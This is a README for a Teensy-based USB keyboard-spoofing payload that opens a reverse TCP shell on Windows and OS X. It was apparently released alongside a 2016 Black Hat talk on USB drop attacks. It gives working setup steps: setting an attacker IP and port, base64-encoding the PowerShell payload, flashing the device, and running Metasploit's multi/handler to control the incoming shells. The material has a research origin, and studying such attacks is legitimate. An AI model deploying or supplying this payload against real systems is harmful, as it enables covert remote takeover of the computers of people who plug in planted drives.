This code allows creation of a cross-platform HID spoofing payload that will spawn a reverse TCP-shell on Windows and OS X.
It was developed as part of the presentation I made at Blackhat USA 2016: Does Dropping USB drives in parking lots and other places really work? to show how to create realistic HID spoofing keys that can be used in USB key drop attack.
For more information on how to make realistic HID spoofing key see my blog post on the subject
To get the payload working you need:
- A Teensy. You can get one directly from Amazon or PRJC
- The Arduino environment with Teensyduino to compile your payload and the Teensy loader to upload the payload to your Teensy. See instructions here
If you want to conceal the Teensy into a realistic key follow the instruction locate in the last third of my blog post on the subject
The payload need to be configured to connect to the server of your choice. There is to way to do it:
That is the easy way and should work on most OSX and Linux or even Windows computers as long as Python is installed. To run it simply invoke:
cd payload
python configure_payload.py IP PORT
where IP is the IP of the server and PORT is the TCP port you want the connection back. Your configured payload is available in the file configured_payload.c.
If you don't have python, something went wrong or want to do it manually. Here is what you need to do:
- Edit the OSX payload from payload/payload_osx.sh to replace the constant IP and PORT with the one from your server
- Replace in payload/payload.c the OSX_PAYLOAD_STR string with your customized payload
- Edit the Windows payload from payload/payload_win.ps and replace the constant IP and PORT with the one from your server
- Compress and encode it with:
cat payload | gzip -c | base64
- Replace the WIN_PAYLOAD_STR string in the payload/payload.c with the output of the previous command. The WIN_PAYLOAD_STR string is in the middle of the Windows payload.
Once the payload is configured, to get your Teensy up and running all you need to do is:
- Create a new project in Arduino environment
- In Tool make sure that the Board option is set to "Teensy 3.2 / 3.1"
- The Tool again set the USB Type option is set to : "Serial Keyboard Mouse Joystick"
- copy/past the code in the Arduino environment
- Check that it is working by pressing the verify button
- Press the compile and upload button to program your Teensy
Congratulations, your Teensy is ready to go.
The server aspect requires to have a server that have a static IP that is reachable form Internet. We are going to use the generic Metasploit multi handler to control the reverse shell(s). Here is briefly how to do it, for more information please read the Metaploit documentation
- Install and launch Metasploit
- Load the multi-handler
use exploit/multi/handler
- Set the Payload to reverse-shell
set payload osx/x64/shell_reverse_tcp
Despite the name, it will works for all OS - Set the IP of the server
set LHOST YOUR_IP
- Set the PORT of the server
set LPORT YOUR_PORT
- Tell Metasploit to not close the plugin when a session disconnect:
set ExitOnSession false
- Launch the paylaod:
exploit -j -z
When a key is plugged you will see a log message indicating a new session is connected. You get the list of sessions by issuing the command:
sessions -l
To control a specific session:
sessions -i session_id